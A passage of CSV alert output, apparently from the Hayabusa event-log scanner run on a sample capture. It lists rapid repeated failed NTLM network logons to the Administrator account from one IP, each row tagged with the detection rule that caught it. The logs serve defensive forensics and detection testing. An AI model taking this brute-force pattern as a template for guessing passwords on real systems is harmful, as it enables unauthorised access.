+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R0omMppAFlFhE1mG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:13.734 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0jMvVN9eSeGW3zcN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:13.782 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HnFNYabbO7IpbVku | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:13.816 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8KtyTTNdqVikZGYY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:13.864 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DCChjnFv2hMXXwgW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:13.918 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FvIYRZSomaJYJOH5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:51:13.965 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FEirUFRscaOwTuAg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:14.005 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RwQgMM9H1oN4te9Z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:14.056 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JbGILYTcFwtYbDk1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:14.168 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p5KzNsgWvyUhNEHd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:14.213 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KGvwbOtP3A5eDKCZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:14.261 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YZvtNNX511hIleST | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:14.299 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lJBRTeW6OQtNrt5u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:14.348 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Hovgq99STVt2GzrO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:14.380 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4kpT3gf0VCAVuVSa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:14.428 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tiB04AvkYp0PP3n1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:14.479 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PPluKgaiT10oC35V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:14.527 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8nCOM9uUeqv9QBx6 | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:14.574 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dSPrrNCh2FSWZKbI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:14.621 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aLDnCjr4pSdKAMX7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:14.673 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: G0UnmfB7lcXKEAvn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:14.722 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ogjMSxcUw7cF5dMa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:14.773 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 75uB8ejsSV5CbagM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:14.814 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
5MMHLnyrzBQxluHn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:14.862 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5QXLn6fpmR52RBAz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:14.908 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KcdlrSUzcFNpaK5v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:14.944 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VJjiRO5rJzZ8XtqP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:14.986 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ncBraDdG2htkHjXU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:15.033 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Lo9DNrL44Z2S2SYR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:15.075 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: QKcFiKC5QiIoHtxy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:15.120 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sqvq9GwuPCO15lUV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:15.164 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4XzgtJ3qUmkFiIY5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:15.215 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V1wc1Hjb4AK0Np1q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:15.253 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PKYNy0JyxIlFusMC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:15.298 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IrcKp13ut9M0pCi0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:15.341 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: B3lJSH0r8iHAVhPF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:15.392 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ju3lCbvbwvkIKsBo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:15.435 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dQOHcZeAKQG6wHhC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:15.474 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QBPkgoKDLABqdSQb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:15.524 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wqj4xOCsJg1j3IIh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:15.561 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XhBIu6wUPHc3DZAy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:15.604 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: W0fI1GhH5YTOHbNN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:15.652 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b7mLOWiojillZNYH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:15.702 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 37dknpwsl8j1WRWi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:15.748 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gzVum7a21sQe3fMt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:15.788 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JCFPSQmywelTXg74 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:15.832 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jCqb6TVV14hVX3NY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:15.888 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3qJsJrxVARedOdd3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:15.936 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s7iNkrkBNEbXPK0B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:15.975 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bio4zciNRolyeHc1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:16.026 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IFf1vN5MgAIsdZvx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:16.072 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zWhgUQSWAycVdYoS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:16.116 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ugHUJZuKHYfUHXWS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:51:16.168 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AUeUmYa72BzHfyhK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:16.212 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ksydur7W1mUoOZAE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:16.261 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YNIzopnsXH6OjcUs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:16.296 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SQljJkaWs8bcaOI1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:16.344 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1jejn6ZMo564m7ok | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:16.440 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KrpBO1SCHpt27CRM | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:16.484 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ifPePsozBYRLCU3k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:16.521 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vve4r8QwaMLKrrcX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:16.569 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i9ArElR5k8yLefWu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:16.604 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4a1Y126C516BaGcz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:16.652 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VL7PnrO2dLsEbebQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:16.686 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GGTlLZ8J9f2PtiuL | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:16.728 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6sVwPFs7bhJgJwRt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:16.772 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dgQNHL9etdHdRw9Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:16.813 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mjZrWpJlN2CwbxFc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:16.858 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 72lmrp6neWGKAURB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:16.896 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CnTi5dgoWunYutJ9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:16.936 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
Vi2fTl07llsJEYyt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:16.980 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Hohh8KS1eYtojEya | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:17.020 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RsuC8F95UmsOSKvs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:17.064 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: be8UJ0EN7XS5r0b6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:17.116 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CgJlVYanwWKAhJ7O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:17.156 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zthqCIkr1nKtqcCj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:17.200 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
